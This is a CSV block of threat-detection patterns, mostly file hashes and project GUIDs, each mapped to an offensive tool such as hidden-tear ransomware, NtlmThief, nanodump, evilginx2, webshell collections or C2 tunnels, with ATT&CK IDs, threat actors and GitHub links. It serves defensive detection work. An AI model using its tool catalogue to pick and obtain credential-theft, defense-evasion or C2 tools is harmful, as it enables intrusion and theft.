"*cd46607d2b9a3046748fea6f99f34ea9342653b82af06e20858a447cc58f0f34*",".{0,1000}cd46607d2b9a3046748fea6f99f34ea9342653b82af06e20858a447cc58f0f34.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","37856"
"*cd46607d2b9a3046748fea6f99f34ea9342653b82af06e20858a447cc58f0f34*",".{0,1000}cd46607d2b9a3046748fea6f99f34ea9342653b82af06e20858a447cc58f0f34.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","37857"
"*cd4d53a9-2db8-4408-90a0-896b2bc4c9f8*",".{0,1000}cd4d53a9\-2db8\-4408\-90a0\-896b2bc4c9f8.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#GUIDproject","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","37859"
"*cd4f7b330f78c41ce8f119e1bd4c14a2da54ed3f2b1482c18247acea6411d2a4*",".{0,1000}cd4f7b330f78c41ce8f119e1bd4c14a2da54ed3f2b1482c18247acea6411d2a4.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","37860"
"*CD517B47-6CA1-4AC3-BC37-D8A27F2F03A0*",".{0,1000}CD517B47\-6CA1\-4AC3\-BC37\-D8A27F2F03A0.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","#GUIDproject","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","37861"
"*cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59*",".{0,1000}cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37862"
"*cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59*",".{0,1000}cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37863"
"*cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59*",".{0,1000}cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37864"
"*cd618bc8eaec4bf2397840938f63f50ddea5458918186a249af976bd081e166e*",".{0,1000}cd618bc8eaec4bf2397840938f63f50ddea5458918186a249af976bd081e166e.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","37867"
"*cd672b609691c61005f4c69233abbce538d334db30e809150f8087b7735bfd2e*",".{0,1000}cd672b609691c61005f4c69233abbce538d334db30e809150f8087b7735bfd2e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37868"
"*cd6857024c9a8bbb90a71a2bdaa72e13a0c7be30d288fe81eda8bb98785e5834*",".{0,1000}cd6857024c9a8bbb90a71a2bdaa72e13a0c7be30d288fe81eda8bb98785e5834.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","37869"
"*cd73e2b32de14c58c3e27d833be05ec7fbfaf569ed10f18d47bf11352d6b4954*",".{0,1000}cd73e2b32de14c58c3e27d833be05ec7fbfaf569ed10f18d47bf11352d6b4954.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37870"
"*cd754d69179c52ea3033cbd92addb351f098e231783733919fede70a8e4b2068*",".{0,1000}cd754d69179c52ea3033cbd92addb351f098e231783733919fede70a8e4b2068.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","37871"
"*cd7e4cd71cb803de24f7b8fc6c6946f96e9b9a95dd3c0888309b42446ba87b94*",".{0,1000}cd7e4cd71cb803de24f7b8fc6c6946f96e9b9a95dd3c0888309b42446ba87b94.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37872"
"*cd7e4cd71cb803de24f7b8fc6c6946f96e9b9a95dd3c0888309b42446ba87b94*",".{0,1000}cd7e4cd71cb803de24f7b8fc6c6946f96e9b9a95dd3c0888309b42446ba87b94.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","37873"
"*cd8055713f9f9249efa639e6c2b7c2db71a801de209f74872ef4112a7bf6103f*",".{0,1000}cd8055713f9f9249efa639e6c2b7c2db71a801de209f74872ef4112a7bf6103f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37874"
"*cd8373622b262e9039a6a6ac47046dc6a50464efb807200e7189f7674e0325dd*",".{0,1000}cd8373622b262e9039a6a6ac47046dc6a50464efb807200e7189f7674e0325dd.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37875"
"*cd85f727429b678fa89ce8d29e520afaa90dc89ff671d740544bb4103d4d7a5a*",".{0,1000}cd85f727429b678fa89ce8d29e520afaa90dc89ff671d740544bb4103d4d7a5a.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","37877"
"*cd8a7916f5beb7a221186784fe7b0b2c4cd01104d699e78bef786b0f9ccf6640*",".{0,1000}cd8a7916f5beb7a221186784fe7b0b2c4cd01104d699e78bef786b0f9ccf6640.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37878"
"*cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd*",".{0,1000}cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","37880"
"*cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd*",".{0,1000}cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","37881"
"*CD8FD3D4-15FD-489C-A334-91F551B98022*",".{0,1000}CD8FD3D4\-15FD\-489C\-A334\-91F551B98022.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#GUIDproject","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","37882"
"*cd92c3c752202b095097b1f2236ed579c473e8da86b6c2928dd0690cee42ab33*",".{0,1000}cd92c3c752202b095097b1f2236ed579c473e8da86b6c2928dd0690cee42ab33.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","37883"
"*cd93c81596eeaa53c9d68afb8a2e6d348ed2401008f95014b86591041632b093*",".{0,1000}cd93c81596eeaa53c9d68afb8a2e6d348ed2401008f95014b86591041632b093.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37884"
"*cd988660fb5f3e0e19236f091fde0b5a154c48070c46bbe7e8cd28bb5a94017a*",".{0,1000}cd988660fb5f3e0e19236f091fde0b5a154c48070c46bbe7e8cd28bb5a94017a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37885"
"*cd9c66c8-8fcb-4d43-975b-a9c8d02ad090*",".{0,1000}cd9c66c8\-8fcb\-4d43\-975b\-a9c8d02ad090.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#GUIDproject","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","37886"
"*cd9c7992a24b65ca21c6f89bf538d396ce057caeffa46f869f0c860d067743c5*",".{0,1000}cd9c7992a24b65ca21c6f89bf538d396ce057caeffa46f869f0c860d067743c5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37887"
"*cd9cc854525e7c75ff146697f8856ead7e1a9a739ab3575cc598eccca1aec680*",".{0,1000}cd9cc854525e7c75ff146697f8856ead7e1a9a739ab3575cc598eccca1aec680.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37888"
"*cdac5cd3d0ff424315da3e233a79f72663c26e53fc4ac2e5031ea08154630514*",".{0,1000}cdac5cd3d0ff424315da3e233a79f72663c26e53fc4ac2e5031ea08154630514.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37889"
"*cdaebe0f3e4166ba3c1575c01ee614e6d2492722e395b60414aed79ef59d84ba*",".{0,1000}cdaebe0f3e4166ba3c1575c01ee614e6d2492722e395b60414aed79ef59d84ba.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37890"
"*cdaee04229c5aefdb806af27910f34d3*",".{0,1000}cdaee04229c5aefdb806af27910f34d3.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","37891"
"*cdb6b0d366c80ef521a59334a58f95ea5b7dbddc6e9f81ff28a11ec44ceba696*",".{0,1000}cdb6b0d366c80ef521a59334a58f95ea5b7dbddc6e9f81ff28a11ec44ceba696.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37893"
"*cdb93e8cd015790f3895a76168b8ce42f73bc7da4ee4ab08c9ea7ae7fecbd9e3*",".{0,1000}cdb93e8cd015790f3895a76168b8ce42f73bc7da4ee4ab08c9ea7ae7fecbd9e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37894"
"*cdbf8f32f74fdb65c2a34bfbf7208e24f0c9cc058d76fed96289964fcff50e2a*",".{0,1000}cdbf8f32f74fdb65c2a34bfbf7208e24f0c9cc058d76fed96289964fcff50e2a.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","37896"
"*cdc1690245f3c8749c1ee9744540aa4df2b784f69cb425a967249c057b9799e8*",".{0,1000}cdc1690245f3c8749c1ee9744540aa4df2b784f69cb425a967249c057b9799e8.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37897"
"*CDC35DDA09316ABD091D51CF9EE78DECE9216ABB9F09FC2CDF4EB36E4971AB3C*",".{0,1000}CDC35DDA09316ABD091D51CF9EE78DECE9216ABB9F09FC2CDF4EB36E4971AB3C.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37898"
"*CDC4F57A-A3F7-459B-87BF-6219DADF6284*",".{0,1000}CDC4F57A\-A3F7\-459B\-87BF\-6219DADF6284.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","37899"
"*cdc7e13638e63b48b6489c35824ee07af51fbc5b0231e220c993f95d4554b673*",".{0,1000}cdc7e13638e63b48b6489c35824ee07af51fbc5b0231e220c993f95d4554b673.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37900"
"*cdcb96e58514e182d0799884b64872caff34ed0eb552d842015941a7540347e7*",".{0,1000}cdcb96e58514e182d0799884b64872caff34ed0eb552d842015941a7540347e7.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","37901"
"*cdd1184f3b6ee040bb0f668cb15a4691d327009942857bd0c62b11cd0e3d0f50*",".{0,1000}cdd1184f3b6ee040bb0f668cb15a4691d327009942857bd0c62b11cd0e3d0f50.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","37902"
"*cdd738401073d7c2c6b919b1a97e136c12467c6ccfbdc1f8b55baa67e4f9afe7*",".{0,1000}cdd738401073d7c2c6b919b1a97e136c12467c6ccfbdc1f8b55baa67e4f9afe7.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","37905"
"*cdda315a5a89bad7451e3f921c57c16cf0d121f2599e1d5595be995ddb4836a3*",".{0,1000}cdda315a5a89bad7451e3f921c57c16cf0d121f2599e1d5595be995ddb4836a3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37906"
"*cddd9cbec4525bc73c44a2c154b12372210e9ccedb9cafd7c495a590c481f6a8*",".{0,1000}cddd9cbec4525bc73c44a2c154b12372210e9ccedb9cafd7c495a590c481f6a8.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","#filehash","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","37907"
"*cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep*",".{0,1000}cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","37909"
"*cde13befb711bf876f0952b847bf8d5e0cc58f6ce208ae54be29411a877f158d*",".{0,1000}cde13befb711bf876f0952b847bf8d5e0cc58f6ce208ae54be29411a877f158d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37911"
"*cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb*",".{0,1000}cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","37913"
"*cde5c0d1b934fbec6b40a6f26c383ac926f27f8f00937313699d2ef5bf671da2*",".{0,1000}cde5c0d1b934fbec6b40a6f26c383ac926f27f8f00937313699d2ef5bf671da2.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37914"
"*cded4541c570c91fd895adeca650b968f20fb68809e59f007a896730d097d8af*",".{0,1000}cded4541c570c91fd895adeca650b968f20fb68809e59f007a896730d097d8af.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37915"
"*cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1*",".{0,1000}cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37916"
"*cdimage.kali.org/*",".{0,1000}cdimage\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","37917"
"*CDK auto exploit via K8s backdoor daemonset*",".{0,1000}CDK\sauto\sexploit\svia\sK8s\sbackdoor\sdaemonset.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#content","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37918"
